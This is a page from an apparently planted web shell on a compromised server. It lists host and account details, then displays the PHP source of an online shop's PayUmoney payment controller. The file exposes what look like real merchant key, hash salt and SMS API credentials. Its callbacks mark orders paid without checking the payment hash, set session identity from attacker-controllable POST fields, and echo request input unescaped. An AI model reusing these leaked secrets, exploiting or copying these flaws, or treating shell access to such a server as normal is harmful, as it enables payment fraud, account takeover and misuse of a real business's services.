shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : Payumoney.php
<?php 

defined('BASEPATH') OR exit('No direct script access allowed');

class Payumoney extends CI_Controller{
    public $CI = NULL;
    
    public function __construct()
    {
        parent::__construct();
        $this->load->model("Curd");
        $this->load->library('cart');
        $this->load->database();
        $this->load->helper('array');
        $this->CI = & get_instance(); 
    }
//paymoney payment gatway 
	public function pay(){
        $PAYUMONEY_ENVIRONMENT = '2';
        if($PAYUMONEY_ENVIRONMENT==1){
            $PAYU_BASE_URL = "https://sandboxsecure.payu.in";
        }else{
            $PAYU_BASE_URL = "https://secure.payu.in";
        }
        $MERCHANT_KEY  = 'gqavfx';
        $SALT= 'xwv8hDcEABoiElYf60PWGCb4VQQylT1h';
        
        //  $MERCHANT_KEY  = 'rjQUPktU';
        // $SALT= 'e5iIg1jwi8';
        $action = '';
         $hash = '';
        // print_r($_POST);
        // die();
        if(isset($_REQUEST['submit'])){
            $posted = array();
             if(!empty($_POST)) {
                //print_r($_POST);
              foreach($_POST as $key => $value) {    
                $posted[$key] = $value; 

              }
            }

            $formError = 0;
            $hashSequence = "key|txnid|amount|productinfo|firstname|email|udf1|udf2|udf3|udf4|udf5|udf6|udf7|udf8|udf9|udf10";
            if(empty($posted['hash']) && sizeof($posted) > 0) {
              if(
                      empty($posted['key'])
                      || empty($posted['txnid'])
                      || empty($posted['amount'])
                      || empty($posted['firstname'])
                      || empty($posted['email'])
                      || empty($posted['phone'])
                      || empty($posted['productinfo'])
                      || empty($posted['surl'])
                      || empty($posted['furl'])
                    || empty($posted['service_provider'])
              ) {
                $formError = 1;
              } else {

                    $hashVarsSeq = explode('|', $hashSequence);
                $hash_string = '';	
                    foreach($hashVarsSeq as $hash_var) {
                  $hash_string .= isset($posted[$hash_var]) ? $posted[$hash_var] : '';
                  $hash_string .= '|';
                }

                $hash_string .= $SALT;


                $hash = strtolower(hash('sha512', $hash_string));
                $action = $PAYU_BASE_URL . '/_payment';
              }
            } elseif(!empty($posted['hash'])) {
              $hash = $posted['hash'];
              $action = $PAYU_BASE_URL . '/_payment';
            } 
        }else{
        }
    $order_res = $this->Curd->fetch_where_order("tb_order",array("*"),array("order_no"=>$_REQUEST['txnid']),"DESC");
    foreach($order_res as $row){
        
    }
             ?>
             <div style="    text-align: center;
    padding: 32px;">
                 <p style="    font-size: 31px;">We are redirecting you to payment gateway page..Please  Click Confirm Pay to proceed further</p> 
         <form action="<?php echo $action; ?>"  id="payuForm"  method="post" name="payuForm">
      <input type="hidden" name="key" value="<?php echo $MERCHANT_KEY ?>" />
      <input type="hidden" name="hash" value="<?php echo $hash; ?>"/>
      <input type="hidden" name="txnid" value="<?php echo $_REQUEST['txnid']; ?>" />
  <input type="hidden" name="amount" value="<?php echo $_REQUEST['amount']; ?>" /> 
  <input type="hidden" name="phone" value="<?php echo $_REQUEST['phone']; ?>" /> 
  
      <input type="hidden" name="firstname" id="firstname" value="<?php echo $row->b_name;?>" />
      <input type="hidden" name="email" id="email" value="<?php echo $row->b_email;?>" />
  
      <input type="hidden" type="text" value="Add Wallet Money" name="productinfo"/>
      <input type="hidden" name="surl" value="<?php echo base_url('payumoney/response');?>" size="64" />
      <input type="hidden" name="furl" value="<?php echo base_url('payumoney/cancel');?>" size="64" />
      <input type="hidden" type="hidden" name="service_provider" value="payu_paisa" size="64" />
      <input type="hidden" name="lastname" id="lastname" value="" />
      <input type="hidden" name="curl" value="" />
      <input type="hidden" name="address1" value="<?php echo $row->b_add;?>" />
  <input type="hidden" name="address2" value="<?php echo $row->b_landmark;?>" />
      <input type="hidden" name="city" value="<?php echo $row->b_city;?>" />
      <input type="hidden" name="state" value="<?php echo $row->b_state;?>" />
      <input type="hidden" name="country" value="INDIA" />
      <input type="hidden" name="zipcode" value="<?php echo $row->b_pincode;?>" />
      <input type="hidden" name="udf1" value="<?php if(isset($_SESSION['user_id'])){echo  $_SESSION['user_id'] ; } ?>" />
       <input type="hidden" name="udf2" value="<?php if(isset($_SESSION['user_token'])){ echo  $_SESSION['user_token']; }?>" /> 
      <input type="hidden" name="udf3" value="" />
      <input type="hidden" name="udf4" value="" />
      <input type="hidden" name="udf5" value="" />
      <input type="hidden" name="pg" value="" />
	  <p class="text-center">
          <?php if(!$hash) { ?>
             <input class="btn btn-success" style="font-size: 31px;
    color: #ffff;
    background: green;
    padding: 14px;"  name="submit" type="submit" value="Confirm Pay" />
            
          <?php }else{ ?>
           <script type="text/javascript">
                    document.payuForm.submit();
            </script> 
          <?php } ?> 
					<a style="    font-size: 31px;
    color: #ffff;
    background: red;
    padding: 17px;
    margin-left: 28px;text-decoration: none;" href="<?php echo base_url('checkout'); ?>" class="btn btn-danger">Cancel</a>
					</p>
				 
          
    </form> </div>                           
                                   
        <?php  
	}
public function response(){
    
       if(isset($_POST["status"]) and !empty($_POST["status"])){
        //   print_r($_POST);
          if($_POST['udf1']) {
      $_SESSION['user_id'] = $_POST['udf1']; }
      if($_POST['udf2']) {
	     $_SESSION['user_token'] = $_POST['udf2']; }
            $add_date         = date('Y-m-d');
            $add_time         = date('H:i:m');
            $status   		= $_POST["status"];
            $firstname 		= $_POST["firstname"];
            $amount		    = $_POST["amount"];
            $txnid		    = $_POST["txnid"];
            $posted_hash    = $_POST["hash"];
            $key		    = $_POST["key"];
            $productinfo	= $_POST["productinfo"];
            $email      = $_POST["email"];
            $addedon    	= $_POST["addedon"];
             $old_order    	= $_POST["udf1"];
            $salt           = "";
       }
        $this->db->where('pay_transaction_id','');
//        $this->db->where('pay_status','');
        $this->db->where('invoice_no','');
        $this->db->where('order_no',$txnid);
        $query =$this->db->get('tb_order');
        if($query->num_rows()>0){
             $user_id = $query->row()->user_id; 
            $user_mobile = $query->row()->mobile; 
             $logs = json_encode($_POST);
             $data = array('pay_status'=>$_POST['status'],'pay_transaction_id'=>$_POST['bank_ref_num'],'pay_logs'=>$logs);
              $this->db->where('pay_transaction_id','');
        // $this->db->where('pay_status','');
        $this->db->where('invoice_no','');
        $this->db->where('order_no',$_POST['txnid']);
             $this->db->update('tb_order',$data);
            //  echo $this->db->last_query();
        }else{

        }
    ?>
      <style type="text/css">
         
     .payment_box{
         width: 40%;
        margin: 0 auto;
        border: 2px dotted #d8d8d8;
        border-radius: 10px;
        padding: 25px;
        margin-top: 8%;
        background: #fafafa;
     }
     .btn {
        display: inline-block;
        margin-bottom: 0;
        font-weight: 400;
        text-align: center;
        vertical-align: middle;
        cursor: pointer;
        background-image: none;
        border: 1px solid transparent;
        white-space: nowrap;
        padding: 6px 12px;
        font-size: 14px;
        line-height: 1.42857143;
        border-radius: 4px; 
            text-decoration: none;
    }
     .btn-success{
        color: #fff;
        background-color: #089c2f;
        border-color: #089c2f;
     }
     .btn-primary{
        color: #fff;
        background-color: #428bca;
        border-color: #357ebd;
     }
    </style>

<center>
<div class="payment_box">
    <?php
    if($_POST['status'] =='success'){
       ?>
         <img src="<?php echo base_url('images/payment-success.gif'); ?>" style="width:200px;">
    <h3>Transaction Successful</h3>   
        <?php 
    }else{
         if($user_id){
            $this->db->select('*');
            $this->db->where('id',$user_id);
            $qty2 = $this->db->get('tb_user');
            if($qty2 ->num_rows() > 0)
            { 
                 $user_mobile = $qty2->row()->mobile;  
            }  
        }
        $order_no = $txnid;
        if($user_mobile){
          $message ="Sorry! Your order No. $order_no couldn't be confirmed and has been cancelled. For more details contact us on 8209722282 See you again! -Shara's Dry Fruits";
         $template_id ="1207162075295906989";
         $Curl_Session = curl_init('https://api.kaleyra.io/v1/HXIN1697376512IN/messages');
        // $Curl_Session = curl_init('37.48.104.215');
        curl_setopt ($Curl_Session, CURLOPT_POST, 1);
        curl_setopt ($Curl_Session, CURLOPT_POSTFIELDS, "api-key=Aaa4faa27f26e73135488e6148ab29e95&to=+91$user_mobile&sender=SARADF&body=$message&source=API&template_id=$template_id");
        curl_setopt ($Curl_Session, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($Curl_Session, CURLOPT_RETURNTRANSFER,1);
        $response=curl_exec ($Curl_Session);
        $err = curl_error($Curl_Session);
        curl_close ($Curl_Session);  
        }
        
        
        ?>
         <img src="<?php echo base_url('images/fail.jpg'); ?>" style="width:100px;">
     <h3>Sorry!</h3> 
     <h3>Transaction Failed</h3>  
        <?php  
    }
    ?>
   
    <ul style="list-style-type: none;"> 
        <li>Order id : <?php echo $_POST['txnid']; ?></li>
        <li>Transaction id : <?php echo $_POST['bank_ref_num']; ?></li>
        <li>Amount : <?php echo $_POST['amount']; ?></li>
    </ul>
    <a href="<?php echo base_url(''); ?>" class="btn btn-primary">Continue Shopping</a> 
</div>
</center>

    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
$(function () {  
    $(document).keydown(function (e) {  
        return (e.which || e.keyCode) != 116;  
    });  
});  
</script>         

    <?php

    }
    public function cancel(){
    //  print_r($_POST);
       if(isset($_POST["status"]) and !empty($_POST["status"])){
        //   print_r($_POST);
          if($_POST['udf1']) {
      $_SESSION['user_id'] = $_POST['udf1']; }
      if($_POST['udf2']) {
	     $_SESSION['user_token'] = $_POST['udf2']; }
            $add_date         = date('Y-m-d');
            $add_time         = date('H:i:m');
            $status   		= $_POST["status"];
            $firstname 		= $_POST["firstname"];
            $amount		    = $_POST["amount"];
            $txnid		    = $_POST["txnid"];
            $posted_hash    = $_POST["hash"];
            $key		    = $_POST["key"];
            $productinfo	= $_POST["productinfo"];
            $email      = $_POST["email"];
            $addedon    	= $_POST["addedon"];
             $old_order    	= $_POST["udf1"];
            $salt           = "";
       }
        $this->db->where('pay_transaction_id','');
//        $this->db->where('pay_status','');
        $this->db->where('invoice_no','');
        $this->db->where('order_no',$txnid);
        $query =$this->db->get('tb_order');
        if($query->num_rows()>0){
             $user_id = $query->row()->user_id; 
            $user_mobile = $query->row()->mobile; 
             $logs = json_encode($_POST);
             $data = array('pay_status'=>$_POST['status'],'pay_logs'=>$logs);
              $this->db->where('pay_transaction_id','');
        // $this->db->where('pay_status','');
        $this->db->where('invoice_no','');
        $this->db->where('order_no',$_POST['txnid']);
             $this->db->update('tb_order',$data);
            //  echo $this->db->last_query();
        }else{

        }
    ?>
      <style type="text/css">
         
     .payment_box{
         width: 40%;
        margin: 0 auto;
        border: 2px dotted #d8d8d8;
        border-radius: 10px;
        padding: 25px;
        margin-top: 8%;
        background: #fafafa;
     }
     .btn {
        display: inline-block;
        margin-bottom: 0;
        font-weight: 400;
        text-align: center;
        vertical-align: middle;
        cursor: pointer;
        background-image: none;
        border: 1px solid transparent;
        white-space: nowrap;
        padding: 6px 12px;
        font-size: 14px;
        line-height: 1.42857143;
        border-radius: 4px; 
            text-decoration: none;
    }
     .btn-success{
        color: #fff;
        background-color: #089c2f;
        border-color: #089c2f;
     }
     .btn-primary{
        color: #fff;
        background-color: #428bca;
        border-color: #357ebd;
     }
    </style>

<center>
<div class="payment_box">
    <?php
    if($_POST['status'] =='success'){
       ?>
         <img src="<?php echo base_url('images/payment-success.gif'); ?>" style="width:200px;">
    <h3>Transaction Successful</h3>   
        <?php 
    }else{
         if($user_id){
            $this->db->select('*');
            $this->db->where('id',$user_id);
            $qty2 = $this->db->get('tb_user');
            if($qty2 ->num_rows() > 0)
            { 
                 $user_mobile = $qty2->row()->mobile;  
            }  
        }
        $order_no = $txnid;
        if($user_mobile){
          $message ="Sorry! Your order No. $order_no couldn't be confirmed and has been cancelled. For more details contact us on 8209722282 See you again! -Shara's Dry Fruits";
         $template_id ="1207162075295906989";
         $Curl_Session = curl_init('https://api.kaleyra.io/v1/HXIN1697376512IN/messages');
        // $Curl_Session = curl_init('37.48.104.215');
        curl_setopt ($Curl_Session, CURLOPT_POST, 1);
        curl_setopt ($Curl_Session, CURLOPT_POSTFIELDS, "api-key=Aaa4faa27f26e73135488e6148ab29e95&to=+91$user_mobile&sender=SARADF&body=$message&source=API&template_id=$template_id");
        curl_setopt ($Curl_Session, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($Curl_Session, CURLOPT_RETURNTRANSFER,1);
        $response=curl_exec ($Curl_Session);
        $err = curl_error($Curl_Session);
        curl_close ($Curl_Session);  
        // print_r($response);
        }
        
        
        ?>
         <img src="<?php echo base_url('images/fail.jpg'); ?>" style="width:100px;">
    <h3>Sorry!</h3> 
     <h3>Transaction Failed</h3>  
        <?php  
    }
    ?>
   
    <ul style="list-style-type: none;"> 
        <li>Order id : <?php echo $_POST['txnid']; ?></li> 
        <li>Amount : <?php echo $_POST['amount']; ?></li>
    </ul>
    <a href="<?php echo base_url(''); ?>" style="    background: green;" class="btn btn-primary">Continue Shopping</a> 
</div>
</center>

    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>  
<script type="text/javascript">  
$(function () {  
    $(document).keydown(function (e) {  
        return (e.which || e.keyCode) != 116;  
    });  
});  
</script>         

    <?php

    }
	public function cancel2(){
	   // print_r($_POST);
	   if($_POST['udf1']) {
      $_SESSION['user_id'] = $_POST['udf1']; }
      if($_POST['udf2']) {
	     $_SESSION['user_token'] = $_POST['udf2']; }
	    
	    
// 	 echo  $user_id = $_SESSION['user_id'];
	     $this->load->view('home/frontend/payumoney-faild');
// 		$this->load->view('frontend/payumoney-faild'); 
	}

}

?>
© 2026 GrazzMean